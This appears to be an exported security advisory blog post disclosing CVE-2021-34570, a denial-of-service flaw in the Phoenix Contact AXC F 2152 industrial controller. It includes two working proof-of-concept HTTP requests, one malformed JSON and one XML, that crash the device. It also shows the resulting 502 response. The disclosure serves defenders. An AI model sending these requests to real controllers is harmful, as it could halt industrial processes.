{"id":6882,"date":"2021-09-23T10:47:04","date_gmt":"2021-09-23T09:47:04","guid":{"rendered":"https:\/\/www.dionach.com\/?p=6882"},"modified":"2024-03-18T15:49:32","modified_gmt":"2024-03-18T15:49:32","slug":"phoenix-contact-axc-f-2152-denial-of-service-vulnerability","status":"publish","type":"post","link":"https:\/\/dionach.com\/en-us\/phoenix-contact-axc-f-2152-denial-of-service-vulnerability\/","title":{"rendered":"Phoenix Contact AXC F 2152 Denial of Service Vulnerability"},"content":{"rendered":"\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t\t
\n\t\t\t
\n\t\t\t\t\t\t
\n\t\t\t\t
\n\t\t\t\t\t\t\t\t\t

Author:<\/strong> Oliver Carrigan \u2013 OT Security Consultant<\/span><\/p>

Introduction<\/h2>

The Phoenix Contact AXC F 2152 is a Linux based industrial controller used within harsh industrial environments to control industrial processes such as manufacturing lines and building management systems. The controller was seen to be vulnerable to a restart vulnerability (CVE-2021-34570) which would allow an unauthenticated attacker with network access to the device to create a denial-of-service condition, impacting the availability of the device.<\/span><\/p>

Vulnerability<\/h2>

The controller runs a Linux based operating system on top of which lies a REST-based API web service used to interact with the web-based HMI. The HMI is used to provide a graphical representation of the current process under control. In order to view the web-based HMI, the controller implements a 3-stage authentication process using Oauth to authenticate the user and ensure they are authorised to access the web-based HMI. An attacker could abuse the \/_pxc_api\/v1.2\/auth\/access-token endpoint used in the authentication process which would force the controller to restart due to a segmentation fault within the controller. This is achieved by crafting a malformed JSON request to the endpoint.<\/span><\/p>

Using a web interception proxy, and modifying the following request:<\/span><\/div>
\u00a0<\/div>
POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/div>
Host: <IP>\nConnection: close\nContent-Length: 129\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/<IP>\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/<IP>\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{\"code\":\"be3fcb3c2bdeff54\",\"grant_type\":\"authorization_code\",\"username\":\"*********\",\"password\":\"********\",\"state\":\"30a847a460c6a1f6\"}<\/pre>
\u00a0<\/div>
The following POCs were used to launch the attack:<\/span><\/p>
POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/p>
Host: <IP>\nConnection: close\nContent-Length: 3\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/<IP>\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/<IP>\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n{<\/strong>\nA<\/strong>\n}<\/strong><\/pre>
POST \/_pxc_api\/v1.2\/auth\/access-token<\/span><\/p>
Host: <IP>\nConnection: close\nContent-Length: 234\nsec-ch-ua: \"Google Chrome\";v=\"89\", \"Chromium\";v=\"89\", \";Not A Brand\";v=\"99\"\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/89.0.4389.82 Safari\/537.36\nContent-Type: text\/plain; charset=UTF-8\nAccept: *\/*\nOrigin: https:\/\/<IP>\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: https:\/\/<IP>\/ehmi\/hmiapp.html\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\n\n<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\"?>\n<root>\n     <password>********<\/password>\n     <code>db0d04e21dbc0ede<\/code>\n     <grant_type\/>\n     <state>4cf70d2058cb2b62<\/state>\n     <username>*********<\/username>\n<\/root><\/strong><\/pre>
Both POCs result in the controller returning the following response and the controller stops responding to ICMP requests.<\/span> <\/p>
HTTP\/1.1 502 Bad Gateway\nServer: nginx\nDate:\nContent-Type: text\/html\nContent-Length: 552\nConnection: close\n\n<html>\n<head><title>502 Bad Gateway<\/title><\/head>\n<body>\n<center><h1>502 Bad Gateway<\/h1><\/center>\n<hr><center>nginx<\/center>\n<\/body>\n<\/html>\n<!-- a padding to disable MSIE and Chrome friendly error page -->\n<!-- a padding to disable MSIE and Chrome friendly error page -->\n<!-- a padding to disable MSIE and Chrome friendly error page -->\n<!-- a padding to disable MSIE and Chrome friendly error page -->\n<!-- a padding to disable MSIE and Chrome friendly error page -->\n<!-- a padding to disable MSIE and Chrome friendly error page --><\/pre>
Proof of Concept Video<\/h2>